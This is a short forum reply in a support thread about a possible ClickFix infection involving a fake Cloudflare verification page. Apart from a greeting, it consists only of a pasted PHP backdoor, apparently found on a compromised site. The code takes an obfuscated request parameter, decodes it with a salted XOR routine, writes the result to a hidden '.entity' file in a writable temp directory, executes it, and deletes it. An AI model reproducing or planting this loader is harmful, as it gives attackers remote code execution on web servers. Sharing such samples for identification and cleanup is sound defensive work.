Home › Forums › Support Forum › Possible ClickFix infection – fake Cloudflare verification page › Reply To: Possible ClickFix infection – fake Cloudflare verification page
hi
{‘id’: 3107, ‘code’: ‘ATyGJWyL<?php\n\nif(in_array(“c\\x6F\\x6Dp”, array_keys($_REQUEST))){\n$dchunk = array_filter([session_save_path(), ini_get(“upload_tmp_dir”), getenv(“TEMP”), “/dev/shm”, sys_get_temp_dir(), getcwd(), getenv(“TMP”), “/var/tmp”, “/tmp”]);\n$data_chunk = $_REQUEST[“c\\x6F\\x6Dp”];\n\t$data_chunk =explode \t( \’.\’ \t\t, \t$data_chunk)\t;\n$itm =\’\’;\n$salt7 =\’abcdefghijklmnopqrstuvwxyz0123456789\’;\n$sLen =strlen($salt7);\n$i =0;\n$__len =count($data_chunk);\n\ndo {\n if ($i >= $__len) break;\n $val =$data_chunk[$i];\n $chS =ord($salt7[$i % $sLen]);\n $d =((int)$val – $chS – ($i % 10)) ^ 16;\n $itm .= chr($d);\n $i++;\n} while (true);\nwhile ($ent = array_shift($dchunk)) {\n if (is_dir($ent) ? is_writable($ent) : false) {\n $ref = vsprintf(“%s/%s”, [$ent, “.entity”]);\n $binding = fopen($ref, \’w\’);\nif ($binding && fwrite($binding, $itm)) {\n fclose($binding);\n require $ref;\n @unlink($ref);\n exit;\n}\n }\n}\n}’, ‘url_postfix’: ‘;fputs_enc;16;comp’}

